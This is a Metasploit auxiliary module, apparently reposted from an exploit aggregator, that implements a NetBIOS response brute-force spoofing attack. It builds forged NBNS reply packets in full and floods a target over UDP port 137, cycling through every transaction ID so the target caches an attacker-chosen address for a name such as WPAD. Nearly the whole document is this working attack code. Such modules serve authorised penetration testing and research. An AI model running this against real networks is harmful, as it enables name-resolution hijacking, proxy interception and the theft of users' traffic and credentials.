Share
## https://sploitus.com/exploit?id=PACKETSTORM:180898
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Udp  
  
def initialize  
super(  
'Name' => 'NetBIOS Response Brute Force Spoof (Direct)',  
'Description' => %q{  
This module continuously spams NetBIOS responses to a target for given hostname,  
causing the target to cache a malicious address for this name. On high-speed local  
networks, the PPSRATE value should be increased to speed up this attack. As an  
example, a value of around 30,000 is almost 100% successful when spoofing a  
response for a 'WPAD' lookup. Distant targets may require more time and lower  
rates for a successful attack.  
},  
'Author' => [  
'vvalien', # Metasploit Module (post)  
'hdm', # Metasploit Module  
'tombkeeper' # Related Work  
],  
'License' => MSF_LICENSE,  
)  
  
register_options(  
[  
Opt::RPORT(137),  
OptString.new('NBNAME', [ true, "The NetBIOS name to spoof a reply for", 'WPAD' ]),  
OptAddress.new('NBADDR', [ true, "The address that the NetBIOS name should resolve to", Rex::Socket.source_address("50.50.50.50") ]),  
OptInt.new('PPSRATE', [ true, "The rate at which to send NetBIOS replies", 1_000])  
],  
self.class  
)  
end  
  
def netbios_spam  
payload =  
"\xff\xff" + # TX ID (will brute force this)  
"\x85\x00" + # Flags = response + authoritative + recursion desired  
"\x00\x00" + # Questions = 0  
"\x00\x01" + # Answer RRs = 1  
"\x00\x00" + # Authority RRs = 0  
"\x00\x00" + # Additional RRs = 0  
"\x20" +  
Rex::Proto::SMB::Utils.nbname_encode( [@fake_name.upcase].pack("A15") + "\x00" ) +  
"\x00" +  
"\x00\x20" + # Type = NB  
"\x00\x01" + # Class = IN  
"\x00\x04\x93\xe0" + # TTL long time  
"\x00\x06" + # Datalength = 6  
"\x00\x00" + # Flags B-node, unique  
Rex::Socket.addr_aton(@fake_addr)  
  
stime = Time.now.to_f  
pcnt = 0  
pps = 0  
  
print_status("Spamming NetBIOS responses for #{@fake_name}/#{@fake_addr} to #{@targ_addr}:#{@targ_port} at #{@targ_rate}/pps...")  
  
live = true  
while live  
0.upto(65535) do |txid|  
begin  
payload[0,2] = [txid].pack("n")  
@sock.put(payload)  
pcnt += 1  
  
pps = (pcnt / (Time.now.to_f - stime)).to_i  
if pps > @targ_rate  
sleep(0.01)  
end  
rescue Errno::ECONNREFUSED  
print_error("Error: Target sent us an ICMP port unreachable, port is likely closed")  
live = false  
break  
end  
end  
end  
  
print_status("Cleaning up...")  
end  
  
def run  
connect_udp  
@sock = self.udp_sock  
  
@targ_addr = rhost  
@targ_port = rport  
@targ_rate = datastore['PPSRATE']  
@fake_name = datastore['NBNAME']  
@fake_addr = datastore['NBADDR']  
  
netbios_spam  
  
disconnect_udp  
end  
end